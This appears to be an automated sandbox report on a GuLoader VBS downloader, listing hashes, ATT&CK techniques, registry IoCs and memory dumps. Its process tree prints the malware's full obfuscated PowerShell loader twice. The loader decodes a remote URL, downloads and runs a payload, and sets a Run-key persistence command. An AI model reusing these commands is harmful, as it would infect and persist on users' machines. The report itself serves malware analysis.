guloader | f01e1cadc743ed6de4df50fd87e53ac2a8c1709d726d99d0e9f401311aec3d40

General

Target

fb7b4de6fe1e517caccbdde9450c7c42d5ba1a42e0a5e5c14e362aeb6ad67745.vbs
Size

5KB
MD5

98c31b202cc3fd8c47b61f085dd4ebfc
SHA1

c678fb695edcb72af3d82f52f1b8292f17398a2e
SHA256

fb7b4de6fe1e517caccbdde9450c7c42d5ba1a42e0a5e5c14e362aeb6ad67745
SHA512

70a0022efaaf7cbbfa3bf4da057a301b8455a844b25510db7db77690fe714d6a7de210647444792a6eee5b53a731b35558eca0077b56f81a5b97bde19c0ba13e
SSDEEP

96:uthC/xE7YcYmAcQ03Lo4PMX0GFf66OticvLmC4EdR4Z8Y:OhC/3NmAcQ03Lo4kX0GFfZOtVL3I8Y

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeielowutil.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ielowutil.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ielowutil.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Software\Microsoft\Windows\CurrentVersion\Run	ielowutil.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kles = "%GULOM% -w 1 $Hemi=(Get-ItemProperty -Path 'HKCU:\\Yacareskel\\').Adres;%GULOM% ($Hemi)"	ielowutil.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

ielowutil.exe

pid process

3232 ielowutil.exe
3232 ielowutil.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeielowutil.exe

pid process

1712 powershell.exe
3232 ielowutil.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1712 set thread context of 3232 1712 powershell.exe ielowutil.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2164 powershell.exe
2164 powershell.exe
1712 powershell.exe
1712 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1712 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2164 powershell.exe
Token: SeDebugPrivilege 1712 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ielowutil.exe

pid process

3232 ielowutil.exe

pid	process
3232	ielowutil.exe
3232	ielowutil.exe

pid	process
1712	powershell.exe
3232	ielowutil.exe

description	pid	process	target process
PID 1712 set thread context of 3232	1712	powershell.exe	ielowutil.exe

pid	process
2164	powershell.exe
2164	powershell.exe
1712	powershell.exe
1712	powershell.exe

pid	process
1712	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe

pid	process
3232	ielowutil.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2740 wrote to memory of 2164	2740	WScript.exe	powershell.exe
PID 2740 wrote to memory of 2164	2740	WScript.exe	powershell.exe
PID 2164 wrote to memory of 1712	2164	powershell.exe	powershell.exe
PID 2164 wrote to memory of 1712	2164	powershell.exe	powershell.exe
PID 2164 wrote to memory of 1712	2164	powershell.exe	powershell.exe
PID 1712 wrote to memory of 3232	1712	powershell.exe	ielowutil.exe
PID 1712 wrote to memory of 3232	1712	powershell.exe	ielowutil.exe
PID 1712 wrote to memory of 3232	1712	powershell.exe	ielowutil.exe
PID 1712 wrote to memory of 3232	1712	powershell.exe	ielowutil.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fb7b4de6fe1e517caccbdde9450c7c42d5ba1a42e0a5e5c14e362aeb6ad67745.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Potteringd1979 ([String]$Skovturene){$Kanukaoops=$Skovturene.toCharArray();For($Fashesuna=5; $Fashesuna -lt $Kanukaoops.count-1; $Fashesuna+=(5+1)){$Elec+=$Kanukaoops[$Fashesuna]};$Elec;}$Vinyletbr=Potteringd1979 'ImperhChuddtDisjatBudgepMessi:Disda/ Vejt/Lskbe9 shay1 Over. Klas2Palle4Inche4Color.Epith1quart9Gokar7Amber.Duode9Mahua/ Multn PolieBredywSeizow Cred/Acadee Opint FouehFrakko TobelUnder. farap unbesStavkpDrivv ';$Elec01=Potteringd1979 'Kaos i Clave SpinxTagry ';$Frstegang = Potteringd1979 ' Akti\Tooths GracySnyltsCodasw JereoGevalwScaw 6Unibr4 Vand\BankdWindvniFrittn IndidVenino PeriwPerensFeltsPpuddeo ThrewKerubePortir RatiSMartahFaktue MarilFestflBesta\Brachvelast1Woolg. Gdni0 tabe\KristpSildeoUnrefw Andee ProgrAlkalsSjagghsvrmeeStkyslstolelsacro.Ambite styrx RockeMasse ';.($Elec01) (Potteringd1979 'Behan$ TearOMarkeo UndenSlutdaAnonyb Slan2Preoc= Spis$MademeunwhinNdrinvTiger:Underw SgefiunrevnGrenadDanseiGemitrSkaer ') ;.($Elec01) (Potteringd1979 'Kuwai$ UdlgFMalpar CentsPrinct Telae DimegVauntaUdpakn Voldg Bran= Nidk$MrtelOCameoo Beden sideaLavpab Skod2 Smut+Oblig$PrcisFFotografflisDecimt SaldeAncylgrelucaPartnn DirtgErken ') ;.($Elec01) (Potteringd1979 ' Dwin$ VariEMigratGigabv DuckrBarreeSjles Letti=Hamme Rema( Pyrr(Olmerg tretwBoligmHaspei Indi farvw VogniStabinTeena3Adels2Grobi_ AfaspImpolrAntheo mudacOverpeIllits ForusDiape Reini- OrnaFManor SammPMiljrrSeparo Tonnc OvereUafvesAgates ZoosI Pacod Anal=hexam$Folke{ UnutPOdelsIHvlspDVinci} Apri)balus.FormaCluggeo ModemInitimProteaIndskn MaitdLjernLKontaiFalsin SkjoeEskap)Asson Demil-FlailsOverqpgallul FriviNapeatRudd Tonic[Etikec DecahDraabaConnerSlots]Enkel3Polyt4 Buti ');.($Elec01) (Potteringd1979 ' Neti$ UnbuIKalden Okket Miste AmphrFortyeFlirtsRetfasBagen Palk=Roban Unst$AsbesE FleltGuldkvApprarMidweeAitis[ Hals$Zink E Lesbt Bestv Carlr SteneAstea.Liniec aurooVideouGuldkn VrketCoali- Face2 Para]Sydve ');.($Elec01) (Potteringd1979 ' Drif$RepreDPandoi SupiaFritik SpejoSkulpn Engei BemrkAppleoFacio=ammia(MenurTEelspeEkvils dekltBlipp- kineP Straa prestInnovh Mous Sempe$ MundFCramprAnaths ErintHymnseCaligg ThyraMccafn Taugg Duod)Skruk Sundh-LaiseAObrotn TurkdSerra Neeb(Inhab[InterI TallnLookatjenkoP VivitPrecir Tide]Camer:Coxof:MailesConvoi Fletz CadmeGasun douz-DebareGtedeq Skri Sall8Laryn)Nosta ') ;if ($Diakoniko) {.$Frstegang $Interess;} else {;$Elec00=Potteringd1979 ' BelaS VacutKvaliaGluter camptStenc- LuftB FootiCommetHffdis overT Korar braca Unden StarsUnthifskribeRens r Eyeg Bulwa- CoevS Doppo MuseuEnalyrPestec Effleprevo Unbo$UnretVSammeiSplennApyreyIodatlRivieeFlagetDramab Tromr Medd Unip-VestmDBlokieStrugsbadevt KlagiPhellnLinjea TewstAasasi FurmoIraqinWater Amer$pellmO Mispo Preon KrmmaUopslb Blas2Recur ';.($Elec01) (Potteringd1979 'Detai$claviOBrydeo Rawnn PredaAdipibSlutm2reest=Forty$KraureBrawnn blaavPlade: Ordua DevapTossmp Unmed Pyroa Reflt antiaRuffe ') ;.($Elec01) (Potteringd1979 'SyzygIhousemVejmap DeseointerrCarpetTaraf-AmyelMLevitoHunandFrsteufractlInsane Proe thortBTellui GisptRotars DrumTForharRespaaTurdan TilbsAmforfOropheForver Rigs ') ;$Oonab2=$Oonab2+'\Startsi.bou';while (-not $Bldgrels) {.($Elec01) (Potteringd1979 'Zooth$ValetB afpllOpiumd NollgBookkrVidere Overl Attis Scal= Bipi(royetT Votee Brnes Foret Mang- lumiPWateraaftentPostmh Kimc Pseud$ RulsO Sproo petrn PrjuaFrequbForst2Lifeb)Hazer ') ;.($Elec01) $Elec00;.($Elec01) (Potteringd1979 'WeirdS carbt SagoaUfiksrMillitMatte-TarsoSCryoclDgndreTangfeBestrpAscom Ostr5Chili ');}.($Elec01) (Potteringd1979 ' Treg$ UdskP RaakoDannetTaxavtHustoeSensarFloneiUncomnPlanig sansd Hose1Besti9 Nuta7 Semi Mopl=Tubis uddybG ivereLemurtSamsa-FractC Vrtpo MlkenPaleotFlavieAvet nSurfltMian Forl$GiskeO SporoBuknin Camoa ForrbPleom2 Macr ');.($Elec01) (Potteringd1979 ' Supe$AstraSBakkaePlanel Fogev Reat Skaa=Ireos pay [ PebeSPremoy Misis krestFastbeImprim Garn. StraCTrngsoColeonImmeav SouteLithor nedktFulde]Killj:Turma:SepulF OsterSnerro Omgnm chriBCanceawoodis TrsteSerge6Usigt4BusynS Vivit ErklrRicheiArbutnKultugBauhi( Bili$OphidPUnoldo CotttMumiftBeshee PresrLegali Supen Akiag GoosdPlast1Natur9Aands7Bross) Rigs ');.($Elec01) (Potteringd1979 'Forar$DoterEBlouslAfskrechertcUdmal2Unpaw Drogi=Futur Abiot[LastnSatelyyAfsoesSplejtpiloseAfgham Plum. OpstTNotate Mindxaskebt Pera. CallEprogrn CostcIdolioJacald KryoiJensknEmbalg Marl]Sgerk:Eksam:resusA eksaS SheyCTouchISamtiIGavfl. SubcGEmulgeFlesht VehiS SisytMoerkr Bacti Yearn CrisgOvers(Tddel$ StryS HekhePluralAlphov Vene)Exurb ');.($Elec01) (Potteringd1979 'Klatr$UnawaBKviddlrefero Intec elaekRegeri Ulnos NutihHarmol Assa=halsr$DruknE defilCovile RetocUdfrs2 Euro. glams Sjusu Unrab Citas velutFurorrNewfaiThrean Helig Hste(Frikt2 Pres0Sycop3 Nonw7 Forn0Hausf5Menzi, Ramp2Disul5 Unde8Efter5 Slkn5Udrug) Flle ');.($Elec01) $Blockishl;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2164

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Potteringd1979 ([String]$Skovturene){$Kanukaoops=$Skovturene.toCharArray();For($Fashesuna=5; $Fashesuna -lt $Kanukaoops.count-1; $Fashesuna+=(5+1)){$Elec+=$Kanukaoops[$Fashesuna]};$Elec;}$Vinyletbr=Potteringd1979 'ImperhChuddtDisjatBudgepMessi:Disda/ Vejt/Lskbe9 shay1 Over. Klas2Palle4Inche4Color.Epith1quart9Gokar7Amber.Duode9Mahua/ Multn PolieBredywSeizow Cred/Acadee Opint FouehFrakko TobelUnder. farap unbesStavkpDrivv ';$Elec01=Potteringd1979 'Kaos i Clave SpinxTagry ';$Frstegang = Potteringd1979 ' Akti\Tooths GracySnyltsCodasw JereoGevalwScaw 6Unibr4 Vand\BankdWindvniFrittn IndidVenino PeriwPerensFeltsPpuddeo ThrewKerubePortir RatiSMartahFaktue MarilFestflBesta\Brachvelast1Woolg. Gdni0 tabe\KristpSildeoUnrefw Andee ProgrAlkalsSjagghsvrmeeStkyslstolelsacro.Ambite styrx RockeMasse ';.($Elec01) (Potteringd1979 'Behan$ TearOMarkeo UndenSlutdaAnonyb Slan2Preoc= Spis$MademeunwhinNdrinvTiger:Underw SgefiunrevnGrenadDanseiGemitrSkaer ') ;.($Elec01) (Potteringd1979 'Kuwai$ UdlgFMalpar CentsPrinct Telae DimegVauntaUdpakn Voldg Bran= Nidk$MrtelOCameoo Beden sideaLavpab Skod2 Smut+Oblig$PrcisFFotografflisDecimt SaldeAncylgrelucaPartnn DirtgErken ') ;.($Elec01) (Potteringd1979 ' Dwin$ VariEMigratGigabv DuckrBarreeSjles Letti=Hamme Rema( Pyrr(Olmerg tretwBoligmHaspei Indi farvw VogniStabinTeena3Adels2Grobi_ AfaspImpolrAntheo mudacOverpeIllits ForusDiape Reini- OrnaFManor SammPMiljrrSeparo Tonnc OvereUafvesAgates ZoosI Pacod Anal=hexam$Folke{ UnutPOdelsIHvlspDVinci} Apri)balus.FormaCluggeo ModemInitimProteaIndskn MaitdLjernLKontaiFalsin SkjoeEskap)Asson Demil-FlailsOverqpgallul FriviNapeatRudd Tonic[Etikec DecahDraabaConnerSlots]Enkel3Polyt4 Buti ');.($Elec01) (Potteringd1979 ' Neti$ UnbuIKalden Okket Miste AmphrFortyeFlirtsRetfasBagen Palk=Roban Unst$AsbesE FleltGuldkvApprarMidweeAitis[ Hals$Zink E Lesbt Bestv Carlr SteneAstea.Liniec aurooVideouGuldkn VrketCoali- Face2 Para]Sydve ');.($Elec01) (Potteringd1979 ' Drif$RepreDPandoi SupiaFritik SpejoSkulpn Engei BemrkAppleoFacio=ammia(MenurTEelspeEkvils dekltBlipp- kineP Straa prestInnovh Mous Sempe$ MundFCramprAnaths ErintHymnseCaligg ThyraMccafn Taugg Duod)Skruk Sundh-LaiseAObrotn TurkdSerra Neeb(Inhab[InterI TallnLookatjenkoP VivitPrecir Tide]Camer:Coxof:MailesConvoi Fletz CadmeGasun douz-DebareGtedeq Skri Sall8Laryn)Nosta ') ;if ($Diakoniko) {.$Frstegang $Interess;} else {;$Elec00=Potteringd1979 ' BelaS VacutKvaliaGluter camptStenc- LuftB FootiCommetHffdis overT Korar braca Unden StarsUnthifskribeRens r Eyeg Bulwa- CoevS Doppo MuseuEnalyrPestec Effleprevo Unbo$UnretVSammeiSplennApyreyIodatlRivieeFlagetDramab Tromr Medd Unip-VestmDBlokieStrugsbadevt KlagiPhellnLinjea TewstAasasi FurmoIraqinWater Amer$pellmO Mispo Preon KrmmaUopslb Blas2Recur ';.($Elec01) (Potteringd1979 'Detai$claviOBrydeo Rawnn PredaAdipibSlutm2reest=Forty$KraureBrawnn blaavPlade: Ordua DevapTossmp Unmed Pyroa Reflt antiaRuffe ') ;.($Elec01) (Potteringd1979 'SyzygIhousemVejmap DeseointerrCarpetTaraf-AmyelMLevitoHunandFrsteufractlInsane Proe thortBTellui GisptRotars DrumTForharRespaaTurdan TilbsAmforfOropheForver Rigs ') ;$Oonab2=$Oonab2+'\Startsi.bou';while (-not $Bldgrels) {.($Elec01) (Potteringd1979 'Zooth$ValetB afpllOpiumd NollgBookkrVidere Overl Attis Scal= Bipi(royetT Votee Brnes Foret Mang- lumiPWateraaftentPostmh Kimc Pseud$ RulsO Sproo petrn PrjuaFrequbForst2Lifeb)Hazer ') ;.($Elec01) $Elec00;.($Elec01) (Potteringd1979 'WeirdS carbt SagoaUfiksrMillitMatte-TarsoSCryoclDgndreTangfeBestrpAscom Ostr5Chili ');}.($Elec01) (Potteringd1979 ' Treg$ UdskP RaakoDannetTaxavtHustoeSensarFloneiUncomnPlanig sansd Hose1Besti9 Nuta7 Semi Mopl=Tubis uddybG ivereLemurtSamsa-FractC Vrtpo MlkenPaleotFlavieAvet nSurfltMian Forl$GiskeO SporoBuknin Camoa ForrbPleom2 Macr ');.($Elec01) (Potteringd1979 ' Supe$AstraSBakkaePlanel Fogev Reat Skaa=Ireos pay [ PebeSPremoy Misis krestFastbeImprim Garn. StraCTrngsoColeonImmeav SouteLithor nedktFulde]Killj:Turma:SepulF OsterSnerro Omgnm chriBCanceawoodis TrsteSerge6Usigt4BusynS Vivit ErklrRicheiArbutnKultugBauhi( Bili$OphidPUnoldo CotttMumiftBeshee PresrLegali Supen Akiag GoosdPlast1Natur9Aands7Bross) Rigs ');.($Elec01) (Potteringd1979 'Forar$DoterEBlouslAfskrechertcUdmal2Unpaw Drogi=Futur Abiot[LastnSatelyyAfsoesSplejtpiloseAfgham Plum. OpstTNotate Mindxaskebt Pera. CallEprogrn CostcIdolioJacald KryoiJensknEmbalg Marl]Sgerk:Eksam:resusA eksaS SheyCTouchISamtiIGavfl. SubcGEmulgeFlesht VehiS SisytMoerkr Bacti Yearn CrisgOvers(Tddel$ StryS HekhePluralAlphov Vene)Exurb ');.($Elec01) (Potteringd1979 'Klatr$UnawaBKviddlrefero Intec elaekRegeri Ulnos NutihHarmol Assa=halsr$DruknE defilCovile RetocUdfrs2 Euro. glams Sjusu Unrab Citas velutFurorrNewfaiThrean Helig Hste(Frikt2 Pres0Sycop3 Nonw7 Forn0Hausf5Menzi, Ramp2Disul5 Unde8Efter5 Slkn5Udrug) Flle ');.($Elec01) $Blockishl;}"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712

C:\Program Files (x86)\internet explorer\ielowutil.exe
"C:\Program Files (x86)\internet explorer\ielowutil.exe"
4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3232

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\logwes.dat
Filesize
184B

MD5
2c38ba5e5eaeebceb5c0f6d536ab095d

SHA1
6ef1756ffbfd39415daf492938611b4e44d11163

SHA256
14e0521544a735c04d6731834e96f88ed502cf44696db94ba9d89deaacaa202c

SHA512
9ed050ee2233a9e5143349a92ee9cdf2a79b45aba85c372d1e5d29db136e937a8798e3fe1ca8dd1cdfd9b7a98f69a2edbea45e237d860771e75576f1e6fbb943

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4y5zjcx.omc.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1712-174-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

Filesize
64KB

Download
memory/1712-148-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

Filesize
64KB

Download
memory/1712-146-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download
memory/1712-149-0x0000000005510000-0x0000000005B38000-memory.dmp

Filesize
6.2MB

Download
memory/1712-150-0x0000000005BB0000-0x0000000005BD2000-memory.dmp

Filesize
136KB

Download
memory/1712-151-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/1712-152-0x0000000005E30000-0x0000000005E96000-memory.dmp

Filesize
408KB

Download
memory/1712-162-0x00000000064C0000-0x00000000064DE000-memory.dmp

Filesize
120KB

Download
memory/1712-164-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

Filesize
64KB

Download
memory/1712-179-0x0000000077781000-0x00000000778A1000-memory.dmp

Filesize
1.1MB

Download
memory/1712-178-0x0000000008A30000-0x000000000C68D000-memory.dmp

Filesize
60.4MB

Download
memory/1712-177-0x0000000007BB0000-0x0000000007BB1000-memory.dmp

Filesize
4KB

Download
memory/1712-165-0x0000000007E00000-0x000000000847A000-memory.dmp

Filesize
6.5MB

Download
memory/1712-166-0x0000000006A50000-0x0000000006A6A000-memory.dmp

Filesize
104KB

Download
memory/1712-210-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download
memory/1712-147-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

Filesize
64KB

Download
memory/1712-168-0x0000000007780000-0x0000000007816000-memory.dmp

Filesize
600KB

Download
memory/1712-169-0x0000000006AE0000-0x0000000006B02000-memory.dmp

Filesize
136KB

Download
memory/1712-170-0x0000000008480000-0x0000000008A24000-memory.dmp

Filesize
5.6MB

Download
memory/1712-175-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

Filesize
64KB

Download
memory/1712-172-0x0000000007B10000-0x0000000007B24000-memory.dmp

Filesize
80KB

Download
memory/1712-173-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download
memory/1712-145-0x0000000004E90000-0x0000000004EC6000-memory.dmp

Filesize
216KB

Download
memory/2164-171-0x000002256CCD0000-0x000002256CCE0000-memory.dmp

Filesize
64KB

Download
memory/2164-144-0x000002256CCD0000-0x000002256CCE0000-memory.dmp

Filesize
64KB

Download
memory/2164-143-0x00007FFC96840000-0x00007FFC97301000-memory.dmp

Filesize
10.8MB

Download
memory/2164-133-0x000002256CD80000-0x000002256CDA2000-memory.dmp

Filesize
136KB

Download
memory/2164-167-0x000002256CCD0000-0x000002256CCE0000-memory.dmp

Filesize
64KB

Download
memory/2164-213-0x00007FFC96840000-0x00007FFC97301000-memory.dmp

Filesize
10.8MB

Download
memory/2164-163-0x00007FFC96840000-0x00007FFC97301000-memory.dmp

Filesize
10.8MB

Download
memory/3232-183-0x0000000000A00000-0x000000000465D000-memory.dmp

Filesize
60.4MB

Download
memory/3232-203-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-185-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-186-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-187-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-188-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-189-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-190-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-193-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-194-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-195-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-196-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-197-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-198-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-199-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-201-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-202-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-184-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-204-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-205-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-206-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-207-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-200-0x0000000000A00000-0x000000000465D000-memory.dmp

Filesize
60.4MB

Download
memory/3232-182-0x0000000077781000-0x00000000778A1000-memory.dmp

Filesize
1.1MB

Download
memory/3232-181-0x0000000077808000-0x0000000077809000-memory.dmp

Filesize
4KB

Download
memory/3232-216-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-217-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-218-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-219-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-220-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-221-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-222-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-223-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-180-0x0000000000A00000-0x000000000465D000-memory.dmp

Filesize
60.4MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads